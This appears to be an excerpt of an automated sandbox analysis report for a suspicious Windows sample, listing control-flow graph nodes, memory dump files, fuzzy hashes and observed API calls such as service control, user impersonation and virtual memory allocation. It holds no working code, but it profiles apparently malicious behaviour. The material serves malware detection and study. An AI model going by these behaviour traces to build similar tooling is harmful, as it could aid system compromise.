                                                                                                      control_flow_graph 48 6e56b8-6e56bd 49 6e56bf 48->49 50 6e5648-6e5679 call 6e567c 48->50 51 6e56e1-6e56e7 49->51 52 6e56c1-6e56cc CreateFileA 49->52 56 6e56ec-6e56f7 51->56 54 6e5974-6e599d call 6e599f 52->54 55 6e56d2-6e56db 52->55 68 6e595f-6e596e 54->68 69 6e599f 54->69 55->56 58 6e56fd-6e5715 56->58 59 6e5716-6e5792 call 6e5724 56->59 58->59 81 6e57af-6e57cb call 6e57ce 59->81 82 6e5798 59->82 68->54 70 6e59a5 69->70 71 6e59b1-6e5a7d 69->71 70->71 74 6e59ab 70->74 96 6e5a85-6e5a95 call 6e5a98 71->96 97 6e5a83 71->97 74->71 82->81 84 6e579e 82->84 84->81 97->96
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1867405325.00000000006DE000.00000040.00000001.01000000.00000006.sdmp, Offset: 00550000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1867112879.0000000000550000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867201417.0000000000556000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867236553.000000000055A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867257167.0000000000566000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867360840.00000000006C6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867381845.00000000006C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867446329.00000000006F4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867464589.00000000006F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867486438.0000000000700000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867505787.0000000000701000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867524536.0000000000703000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867542975.0000000000705000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867565576.000000000071C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867587385.000000000072C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867612422.000000000072D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867684627.0000000000732000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867711046.000000000073E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867770872.0000000000740000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867800335.0000000000743000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867835392.000000000075A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867860121.000000000075C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867885280.0000000000764000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867915071.0000000000767000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867939902.0000000000768000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867965258.0000000000771000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867987003.0000000000772000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868010334.0000000000774000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868040491.0000000000785000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868139707.000000000078B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868163174.0000000000793000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868192164.0000000000796000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868279016.000000000079E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868310474.00000000007A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868391241.00000000007AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868416122.00000000007AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868439900.00000000007AF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868494689.00000000007B2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868522293.00000000007B3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868545785.00000000007B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.00000000007FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.0000000000803000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868694958.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868715019.0000000000814000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_550000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 57ab144e1c2c55d353e304daeda704e3c076c1375688e8c4e6c3da800903757b
                                                                                                      • Instruction ID: 15642ba6cecd450015c760d06031fae4432c53aaf79d9d411df2e45abc80007e
                                                                                                      • Opcode Fuzzy Hash: 57ab144e1c2c55d353e304daeda704e3c076c1375688e8c4e6c3da800903757b
                                                                                                      • Instruction Fuzzy Hash: 7E21E3EB24E7D0BDF601C6562E64AFA6B6ECBC2738B34846BF443CA443E254491E4235

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 100 6e1c48-6e1c4c LoadLibraryA 101 6e1c52-6e1d92 100->101
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1867405325.00000000006DE000.00000040.00000001.01000000.00000006.sdmp, Offset: 00550000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1867112879.0000000000550000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867201417.0000000000556000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867236553.000000000055A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867257167.0000000000566000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867360840.00000000006C6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867381845.00000000006C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867446329.00000000006F4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867464589.00000000006F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867486438.0000000000700000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867505787.0000000000701000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867524536.0000000000703000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867542975.0000000000705000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867565576.000000000071C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867587385.000000000072C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867612422.000000000072D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867684627.0000000000732000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867711046.000000000073E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867770872.0000000000740000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867800335.0000000000743000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867835392.000000000075A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867860121.000000000075C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867885280.0000000000764000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867915071.0000000000767000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867939902.0000000000768000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867965258.0000000000771000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867987003.0000000000772000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868010334.0000000000774000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868040491.0000000000785000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868139707.000000000078B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868163174.0000000000793000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868192164.0000000000796000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868279016.000000000079E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868310474.00000000007A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868391241.00000000007AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868416122.00000000007AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868439900.00000000007AF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868494689.00000000007B2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868522293.00000000007B3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868545785.00000000007B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.00000000007FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.0000000000803000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868694958.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868715019.0000000000814000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_550000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: b47e7651908191e39ebc7a684745571a57e05272f6ae4903ba2c7ad0c90ac181
                                                                                                      • Instruction ID: 342b5e67f4162580eb433c8056ddc003cfdc8bdf4e0b2d89aae72cc74a910f8a
                                                                                                      • Opcode Fuzzy Hash: b47e7651908191e39ebc7a684745571a57e05272f6ae4903ba2c7ad0c90ac181
                                                                                                      • Instruction Fuzzy Hash: 35315DB250C200AFE305AF19DC8167AFBE9FF98721F16492DE7C483650D63558548A97

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 102 4e10d41-4e10d97 104 4e10d99-4e10d9c 102->104 105 4e10d9f-4e10da3 102->105 104->105 106 4e10da5-4e10da8 105->106 107 4e10dab-4e10dda OpenSCManagerW 105->107 106->107 108 4e10de3-4e10df7 107->108 109 4e10ddc-4e10de2 107->109 109->108
                                                                                                      APIs
                                                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04E10DCD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1874763486.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_4e10000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889721586-0
                                                                                                      • Opcode ID: f51d2fbbb208eef21ad49f317d901e5e59c8b6febe95ad7079bafa1e960fe2be
                                                                                                      • Instruction ID: ca010d58498794589dacbf3b33ad382a10ea177705620c67f9181c379ae4d7d1
                                                                                                      • Opcode Fuzzy Hash: f51d2fbbb208eef21ad49f317d901e5e59c8b6febe95ad7079bafa1e960fe2be
                                                                                                      • Instruction Fuzzy Hash: B52138B6C01218DFDB10CF99D485BDEFBF0EB88310F14816AD808AB214D774A945CBA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 111 4e10d48-4e10d97 113 4e10d99-4e10d9c 111->113 114 4e10d9f-4e10da3 111->114 113->114 115 4e10da5-4e10da8 114->115 116 4e10dab-4e10dda OpenSCManagerW 114->116 115->116 117 4e10de3-4e10df7 116->117 118 4e10ddc-4e10de2 116->118 118->117
                                                                                                      APIs
                                                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04E10DCD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1874763486.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_4e10000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ManagerOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889721586-0
                                                                                                      • Opcode ID: 9d1273d90cf9d32943d1f11dbf9290bf0f338f1e6562527852fb3e0dd39fefd6
                                                                                                      • Instruction ID: c8df766b3ddf5f16b0d5cb93070d06ac2463a3ccd5a4501990c878b85280bc75
                                                                                                      • Opcode Fuzzy Hash: 9d1273d90cf9d32943d1f11dbf9290bf0f338f1e6562527852fb3e0dd39fefd6
                                                                                                      • Instruction Fuzzy Hash: 802113B6C01218DFDB50CF9AD884BDEFBF4EB88310F14855AD808AB215D774A944CBA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 120 4e11509-4e11550 121 4e11558-4e1158d ControlService 120->121 122 4e11596-4e115b7 121->122 123 4e1158f-4e11595 121->123 123->122
                                                                                                      APIs
                                                                                                      • ControlService.ADVAPI32(?,?,?), ref: 04E11580
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1874763486.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_4e10000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ControlService
                                                                                                      • String ID:
                                                                                                      • API String ID: 253159669-0
                                                                                                      • Opcode ID: c662995d076b29b61db700bccc8157420fedbaf4d41d90742dc43c420d3288f1
                                                                                                      • Instruction ID: 0e8193377f4e184ead56dbb0085e287611c99467bffe2c2dfff8fecc59fbc2eb
                                                                                                      • Opcode Fuzzy Hash: c662995d076b29b61db700bccc8157420fedbaf4d41d90742dc43c420d3288f1
                                                                                                      • Instruction Fuzzy Hash: C02114B2D00249DFDB10CF9AD485BDEFBF4EB48320F148029E519A7250D378AA45CFA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 125 4e11510-4e1158d ControlService 127 4e11596-4e115b7 125->127 128 4e1158f-4e11595 125->128 128->127
                                                                                                      APIs
                                                                                                      • ControlService.ADVAPI32(?,?,?), ref: 04E11580
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1874763486.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_4e10000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ControlService
                                                                                                      • String ID:
                                                                                                      • API String ID: 253159669-0
                                                                                                      • Opcode ID: 3b962ea98f603e173327bd14ba7bc12af901f355d4f655347c3d387212274191
                                                                                                      • Instruction ID: d47220e08f7e32205c8471e54fcaccd2160dd021aabebbb9e2d55f1954a360d1
                                                                                                      • Opcode Fuzzy Hash: 3b962ea98f603e173327bd14ba7bc12af901f355d4f655347c3d387212274191
                                                                                                      • Instruction Fuzzy Hash: 291114B1D00249DFDB10CF9AD484BDEFBF4EB48320F148029E519A3250D378AA44CFA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 130 4e11301-4e11341 131 4e11349-4e11374 ImpersonateLoggedOnUser 130->131 132 4e11376-4e1137c 131->132 133 4e1137d-4e1139e 131->133 132->133
                                                                                                      APIs
                                                                                                      • ImpersonateLoggedOnUser.KERNELBASE ref: 04E11367
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1874763486.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_4e10000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ImpersonateLoggedUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2216092060-0
                                                                                                      • Opcode ID: bd33b1b311d4b46f24e58c436f896e587a37afc9c7386be4d341cf5e3f4d5265
                                                                                                      • Instruction ID: b37a00f945f8cf56e55ced0b422adac63023b3664f8c531d35872a5dc6f8f6b5
                                                                                                      • Opcode Fuzzy Hash: bd33b1b311d4b46f24e58c436f896e587a37afc9c7386be4d341cf5e3f4d5265
                                                                                                      • Instruction Fuzzy Hash: E2113AB1800249CFDB10CF9AD585BEEFBF4EF48324F148459D559A3250D774A545CFA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 135 4e11308-4e11374 ImpersonateLoggedOnUser 137 4e11376-4e1137c 135->137 138 4e1137d-4e1139e 135->138 137->138
                                                                                                      APIs
                                                                                                      • ImpersonateLoggedOnUser.KERNELBASE ref: 04E11367
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1874763486.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_4e10000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ImpersonateLoggedUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2216092060-0
                                                                                                      • Opcode ID: 2d28c9e3cc2b8c105d4dc3709d6137707e2afd552140d06f0f5201ece012278f
                                                                                                      • Instruction ID: 568b930b70f039db6d051d2c51aabfed55fd4a4d163e09e5587b92e171fba883
                                                                                                      • Opcode Fuzzy Hash: 2d28c9e3cc2b8c105d4dc3709d6137707e2afd552140d06f0f5201ece012278f
                                                                                                      • Instruction Fuzzy Hash: 9E1136B1800349CFDB10CF9AD445BEEFBF4EB48324F14845AD558A3250D778A944CFA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 140 55e8d1-55f41c VirtualAlloc
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 0055F3E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1867236553.000000000055A000.00000040.00000001.01000000.00000006.sdmp, Offset: 00550000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1867112879.0000000000550000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867201417.0000000000556000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867257167.0000000000566000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867360840.00000000006C6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867381845.00000000006C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006DE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867446329.00000000006F4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867464589.00000000006F5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867486438.0000000000700000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867505787.0000000000701000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867524536.0000000000703000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867542975.0000000000705000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867565576.000000000071C000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867587385.000000000072C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867612422.000000000072D000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867684627.0000000000732000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867711046.000000000073E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867739547.000000000073F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867770872.0000000000740000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867800335.0000000000743000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867835392.000000000075A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867860121.000000000075C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867885280.0000000000764000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867915071.0000000000767000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867939902.0000000000768000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867965258.0000000000771000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867987003.0000000000772000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868010334.0000000000774000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868040491.0000000000785000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868139707.000000000078B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868163174.0000000000793000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868192164.0000000000796000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868279016.000000000079E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868310474.00000000007A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868391241.00000000007AD000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868416122.00000000007AE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868439900.00000000007AF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868494689.00000000007B2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868522293.00000000007B3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868545785.00000000007B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.00000000007FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868613859.0000000000803000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868694958.0000000000812000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1868715019.0000000000814000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_550000_94JSCZGRDUWCLDEBY2HC1S58YAX1.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 1d4aa61daa3e494ca9f316ff19eb6b44e138331a5097b17c4300410efd514378
                                                                                                      • Instruction ID: a57fd91ab76337878dcc3cb73dfba119d69031a01dc9ae60ca3b84302d0771fc
                                                                                                      • Opcode Fuzzy Hash: 1d4aa61daa3e494ca9f316ff19eb6b44e138331a5097b17c4300410efd514378
                                                                                                      • Instruction Fuzzy Hash: 42118FF1A0C200AFD304AF29D855A6ABAE9FF88700F14893DAAC9C7754EA319C548757

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 169 55e756-55e75c VirtualAlloc 170 55e768 169->170 171 55e773 170->171 171->171
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.1867236553.000000000055A000.00000040.00000001.01000000.00000006.sdmp, Offset: 00550000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.1867112879.0000000000550000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867159031.0000000000552000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867201417.0000000000556000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867257167.0000000000566000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867360840.00000000006C6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867381845.00000000006C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006DE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.1867405325.00000000006EB000.00000040.00000001.01000000.00000006.sdmpDownload File
